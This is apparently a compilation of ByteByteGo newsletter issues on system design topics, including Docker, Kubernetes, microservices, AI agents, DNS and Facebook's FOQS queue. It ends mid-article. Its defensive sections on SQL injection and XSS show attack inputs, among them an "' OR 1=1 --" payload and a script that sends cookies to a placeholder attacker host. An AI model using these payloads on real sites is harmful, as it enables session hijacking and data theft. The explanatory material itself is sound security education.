
EP185: Docker vs Kubernetes

2025-10-18 23:30:41

AWS Guide to Cloud Architecture Diagrams (Sponsored)

Enhance visibility into your cloud architecture with expert insights from AWS + Datadog. In this ebook, AWS Solutions Architects Jason Mimick and James Wenzel guide you through best practices for creating professional and impactful diagrams.

Download the ebook


This week’s system design refresher:

  • Rate Limiter System Design: Token Bucket, Leaky Bucket, Scaling (Youtube video)

  • Docker vs Kubernetes

  • Batch vs Stream Processing

  • What are Modular Monoliths?

  • What is the difference between Process and Thread?

  • How AI Agents Chain Tools, Memory, and Reasoning?

  • SPONSOR US


Rate Limiter System Design: Token Bucket, Leaky Bucket, Scaling
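
For quick reference alongside the video, here is a minimal, single-process sketch of the token bucket algorithm. The class and parameters are illustrative; a production limiter would typically keep its counters in a shared store such as Redis and handle concurrency.

```python
import time

class TokenBucket:
    """Illustrative token bucket: refills at `rate` tokens/sec, holds at most `capacity`."""

    def __init__(self, rate: float, capacity: float):
        self.rate = rate
        self.capacity = capacity
        self.tokens = capacity
        self.last_refill = time.monotonic()

    def allow(self, cost: float = 1.0) -> bool:
        now = time.monotonic()
        # Refill proportionally to elapsed time, capped at the bucket capacity.
        self.tokens = min(self.capacity, self.tokens + (now - self.last_refill) * self.rate)
        self.last_refill = now
        if self.tokens >= cost:
            self.tokens -= cost
            return True   # request admitted
        return False      # request rejected (or queued/delayed, depending on policy)

limiter = TokenBucket(rate=5, capacity=10)   # ~5 requests/sec, bursts of up to 10
print(limiter.allow())                       # True while tokens remain
```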


Docker vs Kubernetes

Docker is a container platform that lets you package applications with their dependencies and run them on a single machine. Here’s how it works:

  1. Starts with the app code and dependencies written into a Dockerfile.

  2. The image build step creates a portable container image.

  3. A container runtime runs the image directly on the host machine.

  4. Networking connects containers and external services and produces the final running app.
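
As a rough illustration of steps 2 and 3, here is a sketch using the Docker SDK for Python to build an image from a local Dockerfile and run it on the host. The image tag and port mapping are invented for the example.

```python
import docker

client = docker.from_env()  # connect to the local Docker daemon

# Step 2: build a portable container image from the Dockerfile in the current directory.
image, build_logs = client.images.build(path=".", tag="myapp:latest")

# Step 3: run the image as a container directly on the host, publishing port 8000.
container = client.containers.run(
    "myapp:latest",
    detach=True,
    ports={"8000/tcp": 8000},   # step 4: networking exposes the running app
)
print(container.short_id, container.status)
```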

Kubernetes is a container orchestration platform that manages containerized applications across a cluster of machines for scalability and resilience. Here’s how it works:

  1. Starts with the app code and dependencies in a Dockerfile.

  2. The built image is passed to a container runtime supported by Kubernetes.

  3. A master node runs the API server, etcd (key-value store), controller manager, and scheduler to coordinate the cluster.

  4. Worker nodes run the actual containers inside Pods, managed by the kubelet, with kube-proxy handling networking.

  5. Produces a running app that is distributed, scalable, and self-healing in nature.
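
To make step 3 a bit more tangible, the official Kubernetes Python client talks to that API server. A minimal sketch, assuming a kubeconfig is available locally, that lists the Pods scheduled onto the worker nodes:

```python
from kubernetes import client, config

config.load_kube_config()     # use local kubeconfig credentials to reach the API server
v1 = client.CoreV1Api()       # client for the core API group

# Each Pod returned here runs on a worker node under the kubelet's supervision.
for pod in v1.list_pod_for_all_namespaces(watch=False).items:
    print(pod.metadata.namespace, pod.metadata.name, pod.status.phase)
```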

Over to you: Have you used Docker or Kubernetes in your projects?


Batch vs Stream Processing

Data never stops flowing, but how we process it makes all the difference. When building data systems, two main approaches emerge: batch processing and stream processing. Both have their place, depending on whether you need accuracy over time or immediate insights.

Batch Processing: Collects data in chunks and processes it at scheduled intervals, great for reports and historical analysis.

Stream Processing: Processes events continuously in real-time, powering dashboards, alerts, and recommendations.

Batch = high-volume, historical accuracy.
Stream = low-latency, real-time action.
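
A toy illustration of the difference in plain Python. The event source and window size are made up; real systems would use engines like Spark for batch and Flink or Kafka Streams for streaming.

```python
import itertools
import random
from collections import deque

def events():
    """Stand-in event source: an endless stream of purchase amounts."""
    while True:
        yield random.uniform(1, 100)

# Batch processing: collect a fixed chunk, then compute the result once, on a schedule.
batch = list(itertools.islice(events(), 1000))
print("batch total:", round(sum(batch), 2))

# Stream processing: update a sliding-window aggregate as each event arrives.
window = deque(maxlen=100)
for amount in itertools.islice(events(), 500):
    window.append(amount)
    running_total = sum(window)   # fresh insight per event, available immediately
```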

Over to you: Which do you find harder to scale, batch pipelines or real-time streams?


What are Modular Monoliths?

A modular monolith is an architectural pattern that divides an application into independent modules or components. Each of these modules has well-defined boundaries that group related functionalities. Doing so results in better cohesion.

Here are the main characteristics of modular monoliths:

  1. The modules are independent.

  2. Each module provides a specific functionality.

  3. Each module should expose a well-defined interface.
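
A minimal sketch of what such a boundary can look like in Python. The `payments` module name and functions are hypothetical; the point is that other modules depend only on the exposed interface, never on the internals.

```python
# payments/api.py -- the only surface other modules are allowed to import
from dataclasses import dataclass

@dataclass
class PaymentResult:
    ok: bool
    reference: str

def charge(customer_id: str, amount_cents: int) -> PaymentResult:
    """Well-defined interface of the payments module."""
    return _charge_card(customer_id, amount_cents)

def _charge_card(customer_id: str, amount_cents: int) -> PaymentResult:
    # Internal detail, free to change without affecting other modules.
    return PaymentResult(ok=True, reference=f"pay-{customer_id}-{amount_cents}")

# orders/service.py -- a different module in the same deployment unit
# from payments.api import charge
# result = charge("cust_42", 1999)
```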

What is the main advantage of modular monoliths?

A monolith bundles all the functionalities into one big deployment unit. This makes monoliths simple to understand.

Microservices distribute the functionalities into separate deployable units. This makes them more scalable.

However, a modular monolith divides the application into modules that are part of the same deployment unit. This combines the simplicity of traditional monolithic applications with the flexibility of microservices.

In other words, you can have the best of both worlds with modular monoliths.

So - have you used modular monoliths to build applications?


Popular interview question: What is the difference between Process and Thread?

Main differences between process and thread:

  • Processes are usually independent, while threads exist as process subsets.

  • Each process has its own memory space. Threads that belong to the same process share the same memory.

  • A process is a heavyweight operation. It takes more time to create and terminate.

  • Context switching is more expensive between processes.

  • Inter-thread communication is faster than inter-process communication.
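
A small sketch that makes the memory difference visible: a thread mutates the parent's list, while a child process only mutates its own copy. (Behavior shown for CPython; the exact start method varies by OS.)

```python
import threading
import multiprocessing

data = []

def append_item():
    data.append(1)

if __name__ == "__main__":
    # Thread: shares the process memory, so the change is visible to the parent.
    t = threading.Thread(target=append_item)
    t.start(); t.join()
    print("after thread:", data)       # [1]

    # Process: has its own memory space, so the parent's list is unchanged.
    p = multiprocessing.Process(target=append_item)
    p.start(); p.join()
    print("after process:", data)      # still [1]; the child appended to its own copy
```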


How AI Agents Chain Tools, Memory, and Reasoning?

  1. Reasoning: This is the brain of the AI agent. It receives the user’s goal as a query and uses a reasoning loop (built with frameworks like ReAct) to break the goal into a series of smaller, logical steps.

  2. Tools: For each step, the agent selects an appropriate tool. These can be external programs or APIs that it can call upon, such as a web search, a calculator, a code interpreter, or a document store.

  3. Memory: This is like the notebook. The agent records the outcome of each tool’s use in its memory. This notebook allows it to learn from results, maintain context over long conversations, and refine its plan based on new findings.

This continuous loop of reasoning, acting with a tool, and remembering the outcomes creates a chain. Finally, when the agent is satisfied that it has fulfilled the user’s query, it responds to the user.
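
A deliberately simplified sketch of that loop. The `plan_next_step` function and the tools are stand-ins rather than a real framework; the point is the reason → act → remember cycle.

```python
def web_search(query: str) -> str:        # stand-in tool
    return f"search results for: {query}"

def calculator(expression: str) -> str:   # stand-in tool; never eval untrusted input
    return str(eval(expression))

TOOLS = {"search": web_search, "calc": calculator}

def plan_next_step(goal: str, memory: list) -> tuple:
    """Stand-in for the reasoning step: choose a tool and input, or decide to finish."""
    if not memory:
        return "search", goal
    return "finish", f"answer based on: {memory[-1]}"

def run_agent(goal: str) -> str:
    memory = []                                  # the agent's "notebook"
    for _ in range(5):                           # cap the loop length
        tool, arg = plan_next_step(goal, memory)  # reasoning
        if tool == "finish":
            return arg                           # respond to the user
        observation = TOOLS[tool](arg)           # act with a tool
        memory.append(observation)               # remember the outcome
    return memory[-1]

print(run_agent("current Kubernetes release"))
```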

Over to you: Have you used AI agents?


Help us Make ByteByteGo Newsletter Better

TL;DR: Take this 2-minute survey so I can learn more about who you are, what you do, and how I can improve ByteByteGo.

Take the ByteByteGo Survey


SPONSOR US

Get your product in front of more than 1,000,000 tech professionals.

Our newsletter puts your products and services directly in front of an audience that matters - hundreds of thousands of engineering leaders and senior engineers - who have influence over significant tech decisions and big purchases.

Space Fills Up Fast - Reserve Today

Ad spots typically sell out about 4 weeks in advance. To ensure your ad reaches this influential audience, reserve your space now by emailing [email protected].

A Guide to Microservices Architecture for Building Scalable Systems

2025-10-16 23:30:29

Microservices architecture is a way of designing software applications as a collection of small, independent services that work together.

Instead of building one large monolithic application that handles everything, developers break the system into separate pieces. Each piece, called a microservice, focuses on a specific function such as payments, inventory, or user management. These services communicate with each other over a network and can be developed, tested, deployed, and scaled independently.

This approach is very different from the traditional monolithic architecture, where all features are bundled into a single application.

While monoliths can be simpler to start with, they become harder to maintain as they grow. Even a small change in one part may require rebuilding and redeploying the entire system. Microservices solve this by allowing teams to work on different services without affecting the rest of the system. They improve scalability, agility, and fault tolerance, which makes them well-suited for modern, large-scale applications.

At the same time, microservices also introduce complexity. Managing many small services requires strong design patterns, supporting infrastructure, and clear best practices.

In this article, we will explore these patterns, the main components of production-ready microservices, and the practices that help organizations succeed with this architecture.

Guiding Principles for Microservices

Read more

How Salesforce Used AI To Reduce Test Failure Resolution Time By 30%

2025-10-14 23:30:28

Your free ticket to P99 CONF is waiting — 60+ engineering talks on all things performance (Sponsored)

P99 CONF is the technical conference for anyone who obsesses over high-performance, low-latency applications. Leading engineers from today’s most impressive gamechangers will be sharing 60+ talks on topics like Rust, Go, Zig, distributed data systems, Kubernetes, and AI/ML.

Sign up to get 30-day access to the complete O’Reilly library & learning platform, free books, and a chance to win 1 of 500 free swag packs!

Join 30K of your peers for an unprecedented opportunity to learn from experts like Chip Huyen (author of the O’Reilly AI Engineering book), Alexey Milovidov (Clickhouse creator/CTO) & Andy Pavlo (CMU professor) and more – for free, from anywhere.

GET YOUR FREE TICKET


Disclaimer: The details in this post have been derived from the details shared online by the Salesforce Engineering Team. All credit for the technical details goes to the Salesforce Engineering Team. The links to the original articles and sources are present in the references section at the end of the post. We’ve attempted to analyze the details and provide our input about them. If you find any inaccuracies or omissions, please leave a comment, and we will do our best to fix them.

Modern software systems run on millions of automated tests every single day. At Salesforce, this testing ecosystem operates at an enormous scale.

The company runs about 6 million tests daily, covering more than 78 billion possible test combinations. Every month, these tests generate around 150,000 failures, and there are more than 27,000 code changelists submitted each day.

Before automation, dealing with these failures was a slow and tiring process. Developers had to spend hours going through error logs, changelists, and internal tracking systems like GUS to figure out what went wrong. Integration failures were especially difficult because any of the 30,000 engineers across the company could be responsible for a given issue. This made it hard to find the root cause and fix the problem quickly.

The result was a growing backlog of unresolved failures, increasing developer frustration, and long delays. On average, it took about seven days to resolve a single test failure. The Salesforce engineering team recognized that this was not sustainable. They needed a faster, more reliable way to handle failures and keep the development process moving smoothly. This challenge set the stage for building an AI-powered solution to remove these bottlenecks.

In this article, we will look at how Salesforce developed such a system and the key takeaways from their journey.


Ship code that breaks less: Sentry AI Code Review (Sponsored)

Catch issues before they merge. Sentry’s AI Code Review inspects pull requests using real error and performance signals from your codebase. It surfaces high-impact bugs, explains root causes, and generates targeted unit tests in separate branches. Currently supports GitHub and GitHub Enterprise. Free while in open beta.

Learn More About AI Code Review


The Goal of the System

Salesforce has a dedicated Platform Quality Engineering team that plays a critical role in the software development process.

This team acts as the final line of defense before any code is released to customers. While individual scrum teams focus on testing their own products in isolation, the Platform Quality Engineering team goes a step further. They run integration tests across multiple products to make sure everything works well together as one unified system.

This focus on integration is important because customers often use several Salesforce products in combination. A product might work perfectly on its own, but when used together with others, unexpected problems can appear. Customers sometimes describe this as the products feeling like they come from different companies. The Platform Quality Engineering team exists to catch these integration bugs early, before they ever reach customers. Fixing bugs after deployment is expensive and time-consuming, so identifying them early is a major priority for Salesforce.

Beyond this core testing role, the team is always looking for ways to automate engineering workflows and make developers more productive. One of the most time-consuming parts of their work was triaging large numbers of test failures.

To address this, the Salesforce engineering team set a clear goal:

  • Reduce the amount of manual time engineers spend diagnosing failures

  • Give developers clear, context-aware recommendations that help them fix issues quickly

  • Build trust in AI tools by avoiding vague or incorrect suggestions that could waste time

To meet these goals, Salesforce built the Test Failure (TF) Triage Agent, an AI-powered system that provides concrete recommendations within seconds of a failure occurring.

The TF Triage Agent is designed to transform what used to be a slow, manual triage process into a fast and reliable automated workflow. This system fits directly into the team’s mission of maintaining high product quality at scale while keeping the development process efficient.

AI and Automation Architecture

To build an AI-powered system that could process millions of test results quickly and accurately, the Salesforce engineering team designed a specialized AI and automation architecture.

This architecture had to work with massive amounts of noisy, unstructured error data while keeping response times under 30 seconds. Achieving this required a combination of intelligent data processing, search techniques, and careful system design.

Here are the main technical components of the architecture:

1 - Semantic Search with FAISS

Salesforce used FAISS (Facebook AI Similarity Search) to create a semantic search index of historical test failures and their resolutions. FAISS is a library that allows very fast similarity searches between data represented as vectors.

Every time a new test failure occurs, the system performs a vector similarity search against this index to find past failures that look similar. This makes it possible to match a new error with previously fixed problems and suggest likely solutions. Using FAISS replaced older methods that relied on SQL databases, which were too slow for real-time lookups at Salesforce’s scale.
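
A minimal sketch of that similarity lookup with FAISS. The vectors below are random stand-ins; in the real system they would be embeddings of cleaned error logs and their known resolutions.

```python
import faiss
import numpy as np

dim = 384                                                  # embedding size (illustrative)
history = np.random.rand(10_000, dim).astype("float32")    # embeddings of past failures

index = faiss.IndexFlatL2(dim)   # exact nearest-neighbour index over L2 distance
index.add(history)               # index the historical failures once

new_failure = np.random.rand(1, dim).astype("float32")     # embedding of a fresh failure
distances, neighbor_ids = index.search(new_failure, 5)     # 5 most similar past failures
print(neighbor_ids[0])           # ids map back to previously recorded resolutions
```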

2 - Contextual Embeddings and Parsing Pipelines

Error logs and code snippets are often messy and inconsistent. To make them useful for semantic search, the Salesforce engineering team built parsing pipelines that clean and structure the data before it is processed.

Once the data is cleaned, the system generates contextual embeddings, which are mathematical representations that capture the meaning of code snippets and error messages. By embedding both error stacks and historical fixes, the system can compare them in a meaningful way and identify the most probable solutions for a new failure.

3 - Asynchronous and Decoupled Pipelines

The team designed the pipelines to work asynchronously and to be decoupled from the main CI/CD workflows. This means that the AI triage process runs in parallel, without slowing down code integration or testing activities.

This design choice is critical for speed. Instead of making developers wait for the AI system to finish, the pipelines process failures independently and return recommendations quickly, keeping overall latency low.

4 - Hybrid of LLM Reasoning and Semantic Search

The Salesforce engineering team combined semantic search with large language model (LLM) reasoning to get the best of both worlds.

The semantic search step finds the most relevant historical examples, while the LLM then interprets and refines these results to produce clear and specific guidance. This approach ensures that developers receive precise recommendations instead of vague or generic answers. It also helps avoid speculative outputs that can reduce developer trust in AI tools.

Development Approach with Cursor

To build the TF Triage Agent quickly and effectively, the Salesforce engineering team decided to use Cursor, an AI-powered pair programming and code-retrieval tool. This decision played a major role in speeding up development and reducing unnecessary engineering effort.

Normally, building a system like this would have taken several months of manual work. By using Cursor, the Salesforce engineering team was able to complete the project in just four to six weeks. Cursor’s strength lies in its deep integration with the codebase and its ability to provide real-time, contextually relevant code references while engineers are working.

During development, when the team needed to add a new similarity engine to the TF Triage Agent, Cursor made it easy to find existing code patterns that were already implemented elsewhere in the system. This meant engineers did not have to reinvent the wheel for every new component. Instead, they could quickly understand and reuse proven approaches.

Cursor was also valuable when the team faced scaling challenges. Instead of relying on trial and error, engineers could explore multiple architectural options suggested by Cursor and make informed decisions quickly. This ability to iterate fast helped the team build a more reliable and scalable system in a shorter time.

Another key benefit was that Cursor allowed Salesforce engineers to focus their time and energy on the core failure triage logic, which was the most complex and valuable part of the project. Tasks like searching through legacy code or writing repetitive boilerplate were handled much more efficiently with Cursor’s assistance.

Conclusion

By building and deploying the TF Triage Agent, the Salesforce engineering team was able to transform a slow, manual process into a fast and reliable automated workflow.

Some of the key lessons from this project are as follows:

  • By using vector search and embeddings for historical failure data, the system can retrieve the most relevant past solutions quickly and accurately. Adding context-rich prompts and LLM reasoning on top of this improves both the precision of recommendations and the level of trust developers place in the system.

  • The team’s decision to build asynchronous pipelines ensured that triage runs efficiently without blocking critical CI/CD processes. This architectural choice allowed the system to scale smoothly even as it processed millions of tests every day.

  • Another key factor was the use of AI development tools like Cursor, which helped shorten the build cycle from months to just a few weeks.

  • Finally, the Salesforce engineering team approached deployment thoughtfully, using incremental rollout and trust-building through concrete data. This ensured that developers adopted the system with confidence and experienced clear improvements in their daily workflows.

Together, these decisions led to a 30 percent faster test failure resolution time and a significant boost in developer productivity.

Reference:


Help us Make ByteByteGo Newsletter Better

TL;DR: Take this 2-minute survey so I can learn more about who you are, what you do, and how I can improve ByteByteGo.

Take the ByteByteGo Survey


SPONSOR US

Get your product in front of more than 1,000,000 tech professionals.

Our newsletter puts your products and services directly in front of an audience that matters - hundreds of thousands of engineering leaders and senior engineers - who have influence over significant tech decisions and big purchases.

Space Fills Up Fast - Reserve Today

Ad spots typically sell out about 4 weeks in advance. To ensure your ad reaches this influential audience, reserve your space now by emailing [email protected].

EP184: API Vs SDK!

2025-10-11 23:30:23

🚀Faster mobile app releases with automated QA (Sponsored)

Manual testing on mobile devices is too slow and too limited. It forces teams to cut releases a week early just to test before submitting them to app stores. And without broad device coverage, issues slip through.

QA Wolf gets engineering teams to 80% automated test coverage in weeks with tests running on real iOS devices and Android emulators, all in 100% parallel with zero flakes.

  • QA cycles reduced to just 15 minutes

  • Multi-device + gesture interactions are fully supported

  • Reliable test execution with zero flakes

  • Human-verified bug reports

Engineering teams move faster, releases stay on track, and testing happens automatically—so developers can focus on building, not debugging.

Rated 4.8/5 ⭐ on G2

Schedule a demo to learn more


This week’s system design refresher:

  • API Vs SDK!

  • SQL Injection (SQLi)

  • Types of AI Agents

  • 24 Good Resources to Learn Software Architecture in 2025

  • Cross-Site Scripting (XSS) Attacks

  • SPONSOR US


API Vs SDK!

API (Application Programming Interface) and SDK (Software Development Kit) are essential tools in the software development world, but they serve distinct purposes:

API:
An API is a set of rules and protocols that allows different software applications and services to communicate with each other.

  1. It defines how software components should interact.

  2. Facilitates data exchange and functionality access between software components.

  3. Typically consists of endpoints, requests, and responses.

SDK:
An SDK is a comprehensive package of tools, libraries, sample code, and documentation that assists developers in building applications for a particular platform, framework, or hardware.

  1. Offers higher-level abstractions, simplifying development for a specific platform.

  2. Tailored to specific platforms or frameworks, ensuring compatibility and optimal performance on that platform.

  3. Offers access to advanced features and capabilities specific to the platform, which might be otherwise challenging to implement from scratch.

The choice between APIs and SDKs depends on the development goals and requirements of the project.
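
To make the distinction concrete, here is a hedged sketch: calling a hypothetical REST endpoint directly versus going through a small SDK-style wrapper that hides the HTTP plumbing. The URL and class are invented for illustration.

```python
import requests

# API: you work with endpoints, requests, and responses yourself.
resp = requests.get(
    "https://api.example.com/v1/users/42",            # hypothetical endpoint
    headers={"Authorization": "Bearer <token>"},
    timeout=5,
)
user = resp.json()

# SDK: a higher-level abstraction wraps the same API behind friendlier calls.
class ExampleClient:                                   # what a vendor SDK might expose
    def __init__(self, token: str):
        self.token = token

    def get_user(self, user_id: int) -> dict:
        resp = requests.get(
            f"https://api.example.com/v1/users/{user_id}",
            headers={"Authorization": f"Bearer {self.token}"},
            timeout=5,
        )
        resp.raise_for_status()
        return resp.json()

user = ExampleClient("<token>").get_user(42)
```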

Over to you:
Which do you find yourself gravitating towards – APIs or SDKs? Every implementation has a unique story to tell. What’s yours?


a16z backed Dex is the #1 AI recruiter for software engineers (Sponsored)

Get perfectly matched for $200k-1m tech jobs in just 15 minutes.

After a quick chat, Dex scans thousands of roles, identifies the most interesting and compatible opportunities, then connects you directly with hiring managers.

He’ll even help you negotiate the compensation you deserve.

No more job boards, no wasting time speaking to endless recruiters.

Get interviewed today for:

  • Top quant hedge funds ($300k - $1.5M)

  • Leading AI Labs ($200k - $600k)

  • Early to Mid career roles at high-growth tech companies ($100k - $300k)

ByteByteGo readers receive a $1000 bonus when they land a job through Dex.

Don’t wait—chat with Dex now, for free.


SQL Injection (SQLi)

SQL Injection is one of the oldest and most dangerous web vulnerabilities. With just a few crafted inputs, attackers can manipulate database queries and gain access to sensitive data.

Basic SQLi (Tautology-based): Attackers inject conditions like 1=1 to bypass authentication and retrieve all records.

In-band SQLi (Union/Error-based): Attackers use UNION SELECT or leverage error messages to extract usernames, passwords, or other sensitive data directly.

Blind SQLi (Boolean-based): No direct output is shown, but attackers infer database information based on whether a page returns results or not.

Blind SQLi (Time-based): Attackers use commands like SLEEP(5) to measure server response delays and extract data incrementally.
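
For contrast with the attacks above, a quick sketch of the most common defense, parameterized queries, using Python's built-in sqlite3 (table and data are illustrative):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "' OR 1=1 --"   # classic tautology payload

# Vulnerable pattern: string concatenation lets the payload rewrite the query.
# conn.execute("SELECT * FROM users WHERE name = '" + user_input + "'")

# Safe pattern: placeholders keep the input as data, never as SQL.
rows = conn.execute("SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()
print(rows)   # [] -- the payload matches no user instead of dumping the table
```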

Over to you: How do you usually prevent SQLi: prepared statements, ORMs, or something else?


Types of AI Agents

AI agents don’t all think and act in the same way. They range from simple rule-followers to systems that learn and adapt. Each type marks a step forward in how machines perceive, decide, and act.

  1. Simple Reflex Agents: These follow condition–action rules. For example, if the temperature is high, turn on the fan. No memory, no thinking, just instant reaction. They are fast and simple.

  2. Model-based Reflex Agents: These maintain an internal understanding of their environment. They are not just reacting to immediate inputs; they have a model that helps them make sense of what is happening beyond what they can see right now.

  3. Goal-based Agents: Here, the focus shifts to goals. Decisions are made based on whether an action brings the agent closer to its objective.

  4. Utility-based Agents: These go a step further by weighing different outcomes. They choose the action that offers the best overall result, balancing trade-offs along the way.

  5. Learning Agents: These are the most advanced. They improve continuously, using feedback to adapt and perform better over time.
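
As a tiny illustration of the first category, a simple reflex agent is literally a set of condition–action rules (the thresholds here are made up):

```python
def thermostat_agent(temperature_c: float) -> str:
    """Simple reflex agent: no memory, no model, just condition -> action."""
    if temperature_c > 28:
        return "turn_fan_on"
    if temperature_c < 18:
        return "turn_heater_on"
    return "do_nothing"

print(thermostat_agent(31.0))   # turn_fan_on
```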

Over to you: Which type of agent do you think is driving most of today’s AI systems?


24 Good Resources to Learn Software Architecture in 2025

The resources can be divided into different types such as:

  1. Software Design Books
    Some books that can help are DDIA, System Design Volume 1 & 2, Clean Architecture, Domain-Driven Design, and Software Architecture: The Hard Parts.

  2. Tech Blogs and Newsletters
    Read technical blogs by companies like Netflix, Uber, Meta, and Airbnb. Also, the ByteByteGo newsletter provides insights into software design every week.

  3. YouTube Channels and Architectural Resources
    YouTube channels like MIT Distributed Systems, Goto Conferences, and ByteByteGo can help with software architecture and system design. Azure Architecture Center and AWS Architecture Blog are other important resources.

  4. WhitePapers
    For deeper insights, read whitepapers like Facebook Memcache Scaling, Cassandra, Amazon DynamoDB, Kafka, and Google File System.

  5. Software Career Books
    A Software Architect also needs to develop holistic skills. Books about software career aspects such as The Pragmatic Programmer, The Software Architect Elevator, The Software Engineer’s Guidebook, and A Philosophy of Software Design can help.

Over to you: Which other resources will you add to the list?


Cross-Site Scripting (XSS) Attacks

A small script can cause big damage. XSS lets attackers inject malicious code into web pages and hijack user sessions, steal cookies, or manipulate the browser.

Reflected XSS: This type of attack happens when someone clicks a malicious link. The payload sits in the URL, gets reflected back in the response, and executes. It’s often used in phishing campaigns because you need to trick someone into clicking.

Stored XSS: The malicious code gets saved in your database, maybe in a comment field or user profile. Then it runs automatically every time someone loads that page.

DOM-based XSS: The payload manipulates the DOM directly in the browser without ever hitting your server. Makes it harder to catch with traditional server-side validation.
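
One of the simplest defenses is output encoding before user-supplied content is rendered. A minimal sketch with Python's standard library; real applications would lean on an auto-escaping template engine plus a Content Security Policy.

```python
import html

user_comment = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'

# Escaping turns markup characters into harmless entities before rendering.
safe_comment = html.escape(user_comment)
print(safe_comment)
# &lt;script&gt;fetch(&quot;https://evil.example/?c=&quot; + document.cookie)&lt;/script&gt;
```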

Over to you: What is one XSS prevention technique you wish more developers knew about?


Help us Make ByteByteGo Newsletter Better

TL;DR: Take this 2-minute survey so I can learn more about who you are, what you do, and how I can improve ByteByteGo.

Take the ByteByteGo Survey


SPONSOR US

Get your product in front of more than 1,000,000 tech professionals.

Our newsletter puts your products and services directly in front of an audience that matters - hundreds of thousands of engineering leaders and senior engineers - who have influence over significant tech decisions and big purchases.

Space Fills Up Fast - Reserve Today

Ad spots typically sell out about 4 weeks in advance. To ensure your ad reaches this influential audience, reserve your space now by emailing [email protected].

Domain Name System: The Internet’s Telephone Directory

2025-10-09 23:31:17

Every time someone opens a browser and visits a website, sends an email, or uses a mobile app, they’re relying on DNS.

This invisible system has processed thousands of requests on their behalf today alone, translating human-friendly names like google.com into the numerical IP addresses that computers actually use to communicate. Without DNS, the modern internet would be unusable.

DNS, or Domain Name System, is often compared to a phone book. Just as a phone book translates names into phone numbers, DNS translates domain names into IP addresses. This analogy captures the basic concept, but DNS is far more sophisticated. Unlike a static phone book, DNS is a massive, distributed, real-time database that handles billions of requests per second globally. It routes traffic across continents, enables load balancing across servers, and provides the foundation for how services find each other on the internet.
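
That name-to-address translation is a single call away in most languages. A quick sketch with Python's standard library; the addresses you get back will vary by resolver and location.

```python
import socket

# Ask the system resolver (and ultimately DNS) for the addresses behind a name.
for *_, sockaddr in socket.getaddrinfo("google.com", 443, proto=socket.IPPROTO_TCP):
    print(sockaddr[0])   # one or more IPv4/IPv6 addresses for google.com
```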

The critical nature of DNS became painfully clear in October 2016 when a cyberattack on Dyn, a major DNS provider, knocked out access to Twitter, Netflix, Reddit, and dozens of other major services. The websites themselves were functioning perfectly, but without DNS to translate their names into addresses, users couldn’t reach them. It was like having every street sign in a city suddenly disappear.

In this article, we will look at the journey of a DNS query in detail, the various DNS records, and the role of Anycast in DNS.

Journey of a DNS Query

Read more

How Facebook’s Distributed Priority Queue Handles Trillions of Items

2025-10-08 23:31:24

AI AppGen that understands your business (Sponsored)

AI app builders can scaffold a UI from a prompt. But connecting it to your data, deploying it to your preferred environment, and securing it by default? That’s where most tools break down.

Retool takes you all the way—combining AI app generation with your live data, shared components, and security rules to build full-stack apps you can ship on day one.

Generate apps on top of your data, visually edit in context, and get enterprise-grade RBAC, SSO, and audit logs automatically built in.

Build with AI that knows your enterprise


Disclaimer: The details in this post have been derived from the details shared online by the Facebook/Meta Engineering Team. All credit for the technical details goes to the Facebook/Meta Engineering Team. The links to the original articles and sources are present in the references section at the end of the post. We’ve attempted to analyze the details and provide our input about them. If you find any inaccuracies or omissions, please leave a comment, and we will do our best to fix them.

Modern large-scale systems often need to process enormous volumes of work asynchronously.

For example, a social network like Facebook handles many different kinds of background jobs. Some tasks, such as sending a notification, must happen quickly. Others, like translating a large number of posts into multiple languages, can be delayed or processed in parallel. To manage this variety of workloads efficiently, the Facebook engineering team built a service called Facebook Ordered Queueing Service (FOQS).

FOQS is a fully managed, horizontally scalable, multi-tenant distributed priority queue built on sharded MySQL.

In simpler terms, it is a central system that can reliably store and deliver tasks to many different consumers, while respecting their priorities and timing requirements. It acts as a decoupling layer between services, allowing one service to enqueue work and another to process it later. This design keeps systems more resilient and helps engineers control throughput, retry logic, and ordering without building complex custom queues themselves.

The “distributed” part means FOQS runs on many servers at once, and it automatically divides data across multiple MySQL database shards to handle extremely high volumes of tasks. The “priority queue” part means that items can be assigned different importance levels, so the most critical tasks are delivered first. FOQS also supports delayed delivery, letting engineers schedule work for the future rather than immediately.

FOQS plays a key role in some of Facebook’s largest production workflows:

  • The Async platform uses FOQS to defer non-urgent computation and free up resources for real-time operations.

  • Video encoding systems use it to fan out a single upload into many parallel encoding jobs that need to be processed efficiently.

  • Language translation pipelines rely on it to distribute large amounts of parallelizable, compute-heavy translation tasks.

At Facebook’s scale, these background workflows involve trillions of queue operations per day. In this article, we look at how FOQS is structured, how it processes enqueues and dequeues, and how it maintains reliability.

Core Concepts of FOQS

Before looking at how FOQS works internally, it is important to understand the core building blocks that make up the system. Each of these plays a distinct role in how FOQS organizes and delivers tasks at scale.

Namespace

A namespace is the basic unit of multi-tenancy and capacity management in FOQS. Each team or application that uses FOQS gets its own namespace. This separation ensures that one tenant’s workload does not overwhelm others and allows the system to enforce clear performance and quota guarantees.

Every namespace is mapped to exactly one tier. A tier consists of a fleet of FOQS hosts and a set of MySQL shards. You can think of a tier as a self-contained slice of the FOQS infrastructure. By assigning a namespace to a specific tier, Facebook ensures predictable capacity and isolation between different workloads.

Each namespace is also assigned a guaranteed capacity, measured in enqueues per minute. This is the number of items that can be added to the queue per minute without being throttled. These quotas help protect the underlying storage and prevent sudden spikes in one workload from affecting others.

Overall, this design allows FOQS to support many different teams inside Facebook simultaneously, each with its own usage pattern.

Topic

Within a namespace, work is further organized into topics.

A topic acts as a logical priority queue, identified by a simple string name. Topics are designed to be lightweight and dynamic. A new topic is created automatically when the first item is enqueued to it, and it is automatically cleaned up when it becomes empty. There is no need for manual provisioning or configuration.

To help consumers discover available topics, FOQS provides an API called GetActiveTopics. This returns a list of currently active topics in a namespace, meaning topics that have at least one item waiting to be processed. This feature allows consumers to easily find which queues have pending work, even in systems with a large and changing set of topics.

Dynamic topics make FOQS flexible. For example, a video processing system might create a new topic for each uploaded video to process its encoding tasks in isolation. Once the encoding finishes and the queue is empty, the topic disappears automatically.

Item

The item is the most important unit in FOQS because it represents a single task waiting to be processed. Internally, each item is stored as one row in a MySQL table, which allows FOQS to leverage the reliability and indexing capabilities of MySQL.

Each item contains several fields:

  • Namespace and topic identify which logical queue the item belongs to.

  • Priority is a 32-bit integer where a lower value means higher priority. This determines the order in which items are delivered.

